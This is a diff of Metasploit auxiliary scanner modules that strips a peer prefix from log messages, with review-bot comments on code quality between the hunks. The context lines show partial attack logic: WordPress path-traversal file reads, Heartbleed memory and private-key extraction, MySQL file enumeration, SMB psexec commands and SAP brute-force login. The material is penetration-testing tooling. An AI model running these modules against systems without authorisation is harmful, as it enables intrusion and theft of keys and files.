@@ -93,20 +93,20 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") traversal = "../" * datastore['DEPTH'] filename = datastore['DIRPATH'] @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.") + print_error("Nothing was downloaded. You can try to change the DIRPATH.") end end end diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 4c8334e289..7f0559721d 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary ) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way.") + vprint_error("Server did not respond in an expected way.") return end 
@@ -81,9 +81,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") + vprint_error("Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") end end end diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 78e9e72086..001e7a8f7a 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -116,25 +116,25 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") - vprint_status("#{peer} - Trying to download filepath.") + vprint_status("Trying to download filepath.") file_path = down_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error downloading filepath.") + print_error("Error downloading filepath.") return end 
@@ -164,9 +164,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") + print_error("Nothing was downloaded. You can try to change the FILEPATH.") end end end diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index ead12ac27a..f62eb75a58 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -35,19 +35,19 @@ class Metasploit3 < Msf::Auxiliary end def run_host(target_host) - vprint_status("#{peer} - Sending RMI Header...") + vprint_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end # Determine if the instance allows remote class loading - vprint_status("#{peer} - Sending RMI Call...") + vprint_status("Sending RMI Call...") jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar' jar_url = "file:RMIClassLoaderSecurityTest/" + jar @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary return_value = recv_return if return_value.nil? - print_error("#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected") + print_error("Failed to send RMI Call, anyway JAVA RMI Endpoint detected") report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "") return end diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 8c7fa985c9..04900cde94 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb 
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status "#{peer} - SunRPC - Enumerating programs" + vprint_status "SunRPC - Enumerating programs" begin program = 100000 @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end sunrpc_destroy return if maps.empty? - vprint_good("#{peer} - Found #{maps.size} programs available") + vprint_good("Found #{maps.size} programs available") table = Rex::Ui::Text::Table.new( 'Header' => "SunRPC Programs for #{ip}", diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7219f8eab1..f5b6bdbe5c 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Login...") + vprint_status("Login...") if (not mysql_login_datastore) return @@ -53,10 +53,10 @@ class Metasploit3 < Msf::Auxiliary begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary table_exists = (res.size == 1) if !table_exists - vprint_status("#{peer} - Table doesn't exist so creating it") + vprint_status("Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary file.close if !table_exists - vprint_status("#{peer} - Cleaning up the temp table") + vprint_status("Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end 
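Review bot: The local `peer = "#{ip}:#{rport}"` kept as context in sunrpc_portmapper.rb's `run_host` (`@@ -28,7`) is no longer read by any line in the visible hunks once the interpolations are removed. If nothing further down the method uses it, the assignment is dead code, and it also shadows any `peer` helper the module may inherit, so it is better dropped. The same leftover assignment appears in smb_uninit_cred.rb at `@@ -255,13`. Both methods extend beyond their hunks, so confirm there is no later use before deleting.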
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good("#{peer} - #{dir} is a directory and exists") + print_good("#{dir} is a directory and exists") report_note( :host => rhost, :type => "filesystem.dir", @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", @@ -104,15 +104,15 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::ServerError - vprint_warning("#{peer} - #{dir} does not exist") + vprint_warning("#{dir} does not exist") rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return else - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 2d85876963..6d91606685 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb 
@@ -33,15 +33,15 @@ class Metasploit3 < Msf::Auxiliary end def run_host(_ip) - vprint_status("#{peer} -- contacting redis") + vprint_status("Contacting redis") begin connect return unless (data = redis_command(command)) report_service(host: rhost, port: rport, name: "redis server", info: "#{command} response: #{data}") - print_good("#{peer} -- found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") + print_good("Found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::Errno::ETIMEDOUT => e - vprint_error("#{peer} -- error while communicating: #{e}") + vprint_error("Error while communicating: #{e}") ensure disconnect end diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 37584933e1..547e102a79 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary elsif res =~ /^#{RSYNC_HEADER} OK$/ 'not required' else - vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}") + vprint_error("unexpected response when connecting to #{rmodule}: #{res}") "unexpected response '#{res}'" end else - vprint_error("#{peer} - no response when connecting to #{rmodule}") + vprint_error("no response when connecting to #{rmodule}") 'no response' end end @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary end unless version - vprint_error("#{peer} - no rsync negotiation found") + vprint_error("no rsync negotiation found") return end 
@@ -149,12 +149,12 @@ class Metasploit3 < Msf::Auxiliary connect version, motd = rsync_negotiate unless version - vprint_error("#{peer} - does not appear to be rsync") + vprint_error("does not appear to be rsync") disconnect return end rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while connecting and negotiating: #{e}") + vprint_error("error while connecting and negotiating: #{e}") disconnect return end @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Auxiliary name: 'rsync', info: info ) - print_status("#{peer} - rsync version: #{version}") if datastore['SHOW_VERSION'] - print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] + print_status("rsync version: #{version}") if datastore['SHOW_VERSION'] + print_status("rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] modules_metadata = {} begin @@ -182,10 +182,10 @@ class Metasploit3 < Msf::Auxiliary end if modules_metadata.empty? - print_status("#{peer} - no rsync modules found") + print_status("no rsync modules found") else modules = modules_metadata.map { |m| m[:name] } - print_good("#{peer} - #{modules.size} rsync modules found: #{modules.join(', ')}") + print_good("#{modules.size} rsync modules found: #{modules.join(', ')}") table_columns = %w(Name Comment) if datastore['TEST_AUTHENTICATION'] @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary rsync_negotiate module_metadata[:authentication] = get_rsync_auth_status(module_metadata[:name]) rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while testing authentication on #{module_metadata[:name]}: #{e}") + vprint_error("error while testing authentication on #{module_metadata[:name]}: #{e}") break ensure disconnect diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index b7543c4122..57af398132 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb 
@@ -95,7 +95,7 @@ class Metasploit4 < Msf::Auxiliary pass = pass.gsub("<SAPSID>", datastore["SAP_SID"]) end - print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'") + print_status("Trying username:'#{user}' password:'#{pass}'") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 5929b84dbf..6717969a73 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary connect smb_login rescue StandardError => autherror - print_error("#{peer} - #{autherror}") + print_error("#{autherror}") return end @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_")} return cleanout rescue StandardError => hku_error - print_error("#{peer} - Error runing query against HKU. #{hku_error.class}. #{hku_error}") + print_error("Error runing query against HKU. #{hku_error.class}. #{hku_error}") return nil end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary simple.disconnect("\\\\#{ip}\\#{smbshare}") return output rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + print_error("Error getting command output. #{output_error.class}. #{output_error}.") return false end end @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary domain = line if line.include?("USERDOMAIN") end if domain.split(" ")[2].to_s.chomp + "\\" + username.split(" ")[2].to_s.chomp == datastore['USERNAME'] - print_good("#{peer} - #{datastore['USERNAME']} is logged in") + print_good("#{datastore['USERNAME']} is logged in") report_user(datastore['USERNAME']) end return 
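Review bot: With the prefix gone, `print_error("#{autherror}")` in psexec_loggedin_users.rb (`@@ -59,7`) is a string literal that only interpolates a single value; `print_error(autherror.to_s)` states the intent directly. The same applies to the `print_good("#{user}")` calls at `@@ -150,7` and `@@ -158,24`, and to the `vprint_status("#{res.inspect}")` calls in smtp_relay.rb, where `vprint_status(res.inspect)` is enough. The touched messages "Error runing query against HKU" and "Unable to processes cleanup commands" also carry typos that could be fixed in the same pass.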
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary end if username.length > 0 && domain.length > 0 user = domain.split(" ")[2].to_s + "\\" + username.split(" ")[2].to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) elsif logonserver.length > 0 && homepath.length > 0 uname = homepath.split('\\')[homepath.split('\\').size - 1] @@ -158,24 +158,24 @@ class Metasploit3 < Msf::Auxiliary uname = uname.split(".")[0] end user = logonserver.split('\\\\')[1].chomp.to_s + "\\" + uname.to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else username = query_session(smbshare, ip, cmd, text, bat) if username hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." user = "#{hostname}\\#{username}" - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else - print_status("#{peer} - Unable to determine user information for user: #{key}") + print_status("Unable to determine user information for user: #{key}") end end else - print_status("#{peer} - Could not determine logged in users") + print_status("Could not determine logged in users") end rescue Rex::Proto::SMB::Exceptions::Error => check_error - print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") + print_error("Error checking reg key. #{check_error.class}. #{check_error}") return check_error end end 
@@ -185,12 +185,12 @@ class Metasploit3 < Msf::Auxiliary begin # Try and do cleanup command cleanup = "#{cmd} /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup") + print_status("Executing cleanup") out = psexec(cleanup) rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands: #{cleanuperror}") - print_warning("#{peer} - Maybe %SYSTEMDRIVE%#{text} must be deleted manually") - print_warning("#{peer} - Maybe #{bat} must be deleted manually") + print_error("Unable to processes cleanup commands: #{cleanuperror}") + print_warning("Maybe %SYSTEMDRIVE%#{text} must be deleted manually") + print_warning("Maybe #{bat} must be deleted manually") return cleanuperror end end diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index abed2f4c4f..8a0c584137 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -255,13 +255,13 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" case check_host(ip) when Exploit::CheckCode::Vulnerable - print_good("#{peer} - The target is vulnerable to CVE-2015-0240.") + print_good("The target is vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Appears - print_good("#{peer} - The target appears to be vulnerable to CVE-2015-0240.") + print_good("The target appears to be vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Detected - print_status("#{peer} - The target appears to be running Samba.") + print_status("The target appears to be running Samba.") else - print_status("#{peer} - The target appears to be safe") + print_status("The target appears to be safe") end end diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index 1c5be24aad..cac03b0b94 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb 
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary begin connect banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) - print_status("#{peer} - SMTP #{banner_sanitized}") + print_status("SMTP #{banner_sanitized}") report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner) if datastore['EXTENDED'] @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary do_test_relay(nil, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>") end rescue - print_error("#{peer} - Unable to establish an SMTP session") + print_error("Unable to establish an SMTP session") return end end 
@@ -86,36 +86,36 @@ class Metasploit3 < Msf::Auxiliary connect res = raw_send_recv("EHLO X\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailfrom}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailto}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("DATA\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") if res =~ /250/ if testnumber.nil? - print_good("#{peer} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") else - print_good("#{peer} - Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") end else if testnumber.nil? - print_status "#{peer} - No relay detected" + print_status "No relay detected" else - print_status "#{peer} - Test ##{testnumber} - No relay detected" + print_status "Test ##{testnumber} - No relay detected" end end rescue - print_error("#{peer} - Test ##{testnumber} - Unable to establish an SMTP session") + print_error("Test ##{testnumber} - Unable to establish an SMTP session") return end end diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 69f1e4cfa4..7b727ef94c 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb 
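Review bot: The `rescue` message at the end of the `@@ -86,36` hunk interpolates `testnumber` unconditionally, although the branches above check `testnumber.nil?`. The non-extended test therefore prints "Test # - Unable to establish an SMTP session". Building the prefix once, for example `label = testnumber ? "Test ##{testnumber} - " : ''`, and reusing it in all three places would fix this and remove the duplicated if/else pairs. The bare `rescue` also reports every StandardError as a connection failure, which can hide unrelated bugs; naming the connection error classes explicitly would be clearer. The method's `def` line is outside the hunk.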
@@ -123,16 +123,16 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending CCS...") + vprint_status("Sending CCS...") sock.put(ccs) alert = sock.get_once(-1, response_timeout) if alert.blank? - print_good("#{peer} - No alert after invalid CCS message, probably vulnerable") + print_good("No alert after invalid CCS message, probably vulnerable") report elsif alert.unpack("C").first == ALERT_RECORD_TYPE - vprint_error("#{peer} - Alert record as response to the invalid CCS Message, probably not vulnerable") + vprint_error("Alert record as response to the invalid CCS Message, probably not vulnerable") elsif alert - vprint_warning("#{peer} - Unexpected response.") + vprint_warning("Unexpected response.") end end @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Auxiliary def establish_connect connect - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_hello = sock.get_once(-1, response_timeout) unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + vprint_error("No Server Hello after #{response_timeout} seconds...") disconnect return nil end unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 6d1a466b31..409c8722ad 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(ip) @check_only = true - vprint_status "#{peer} - Checking for Heartbleed exposure" + vprint_status "Checking for Heartbleed exposure" if bleed Exploit::CheckCode::Appears else 
@@ -339,13 +339,13 @@ class Metasploit3 < Msf::Auxiliary if jabber_host && jabber_host[1] disconnect establish_connect - vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") + vprint_status("Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = get_data end end if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/ - vprint_error("#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown') + vprint_error("Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown') return nil end msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" @@ -364,7 +364,7 @@ class Metasploit3 < Msf::Auxiliary return nil if res.nil? if res !~ /^234/ # res contains the error message - vprint_error("#{peer} - FTP error: #{res.strip}") + vprint_error("FTP error: #{res.strip}") return nil end res @@ -408,21 +408,21 @@ class Metasploit3 < Msf::Auxiliary connect unless tls_callback == 'None' - vprint_status("#{peer} - Trying to start SSL via #{tls_callback}") + vprint_status("Trying to start SSL via #{tls_callback}") res = self.send(TLS_CALLBACKS[tls_callback]) if res.nil? - vprint_error("#{peer} - STARTTLS failed...") + vprint_error("STARTTLS failed...") return nil end end - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_resp = get_server_hello if server_resp.nil? - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end 
@@ -442,11 +442,11 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending Heartbeat...") + vprint_status("Sending Heartbeat...") sock.put(heartbeat_request(heartbeat_length)) hdr = get_data(SSL_RECORD_HEADER_SIZE) if hdr.nil? || hdr.empty? - vprint_error("#{peer} - No Heartbeat response...") + vprint_error("No Heartbeat response...") disconnect return end @@ -470,19 +470,19 @@ class Metasploit3 < Msf::Auxiliary else msg = 'Unknown error' end - vprint_error("#{peer} - #{msg}") + vprint_error("#{msg}") disconnect return end unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version] - vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})") + vprint_error("Unexpected Heartbeat response header (#{to_hex_string(hdr)})") disconnect return end heartbeat_data = get_data(heartbeat_length) - vprint_status("#{peer} - Heartbeat response, #{heartbeat_data.length} bytes") + vprint_status("Heartbeat response, #{heartbeat_data.length} bytes") disconnect heartbeat_data end @@ -491,11 +491,11 @@ class Metasploit3 < Msf::Auxiliary def loot_and_report(heartbeat_data) unless heartbeat_data - vprint_error("#{peer} - Looks like there isn't leaked information...") + vprint_error("Looks like there isn't leaked information...") return end - print_good("#{peer} - Heartbeat response with leak") + print_good("Heartbeat response with leak") report_vuln({ :host => rhost, :port => rport, @@ -519,7 +519,7 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed server memory' ) - print_status("#{peer} - Heartbeat data stored in #{path}") + print_status("Heartbeat data stored in #{path}") end # Convert non-printable characters to periods @@ -536,7 +536,7 @@ class Metasploit3 < Msf::Auxiliary end # Show abbreviated data - vprint_status("#{peer} - Printable info leaked:\n#{abbreviated_data}") + vprint_status("Printable info leaked:\n#{abbreviated_data}") end 
@@ -550,24 +550,24 @@ class Metasploit3 < Msf::Auxiliary disconnect return if connect_result.nil? - print_status("#{peer} - Scanning for private keys") + print_status("Scanning for private keys") count = 0 - print_status("#{peer} - Getting public key constants...") + print_status("Getting public key constants...") n, e = get_ne if n.nil? || e.nil? - print_error("#{peer} - Failed to get public key, aborting.") + print_error("Failed to get public key, aborting.") end - vprint_status("#{peer} - n: #{n}") - vprint_status("#{peer} - e: #{e}") - print_status("#{peer} - #{Time.now.getutc} - Starting.") + vprint_status("n: #{n}") + vprint_status("e: #{e}") + print_status("#{Time.now.getutc} - Starting.") max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys if count % status_every == 0 - print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") + print_status("#{Time.now.getutc} - Attempt #{count}...") end bleedresult = bleed @@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary unless p.nil? || q.nil? key = key_from_pqe(p, q, e) - print_good("#{peer} - #{Time.now.getutc} - Got the private key") + print_good("#{Time.now.getutc} - Got the private key") print_status(key.export) path = store_loot( @@ -588,18 +588,18 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed Private Key' ) - print_status("#{peer} - Private key stored in #{path}") + print_status("Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") + print_error("Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end # Returns the N and E params from the public server certificate def get_ne unless @cert - print_error("#{peer} - No certificate found") + print_error("No certificate found") return end 
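Review bot: The branch that prints `"Failed to get public key, aborting."` does not abort. There is no `return` after the `print_error` call, so when `n` or `e` is nil, execution falls through to the `vprint_status("n: #{n}")` lines and then into the `max_keytries.times` loop. Since this commit edits that line anyway, add a bare `return` directly after it inside the `if n.nil? || e.nil?` block. The enclosing method starts above the hunk.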
@@ -619,7 +619,7 @@ class Metasploit3 < Msf::Auxiliary # Only try candidates that have a chance... q, rem = n / can if rem == 0 && can != n - vprint_good("#{peer} - Found factor at offset #{x.to_s(16)}") + vprint_good("Found factor at offset #{x.to_s(16)}") p = can return p, q end @@ -692,7 +692,7 @@ class Metasploit3 < Msf::Auxiliary hdr = get_data(SSL_RECORD_HEADER_SIZE) unless hdr - vprint_error("#{peer} - No SSL record header received after #{response_timeout} seconds...") + vprint_error("No SSL record header received after #{response_timeout} seconds...") return nil end @@ -700,7 +700,7 @@ class Metasploit3 < Msf::Auxiliary data = get_data(len) unless data - vprint_error("#{peer} - No SSL record contents received after #{response_timeout} seconds...") + vprint_error("No SSL record contents received after #{response_timeout} seconds...") return nil end diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index b3de7313ce..54bf04b7c3 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary uri = normalize_uri(target_uri.to_s) mac = datastore["MAC"] - print_status("#{peer} - Getting fintnumbers and display names of the IP phone") + print_status("Getting fintnumbers and display names of the IP phone") res = send_request_cgi( { @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/ - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") print_status("#{res}") return [] end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary end lines.size.times do |i| - print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") + print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") end fint_numbers 
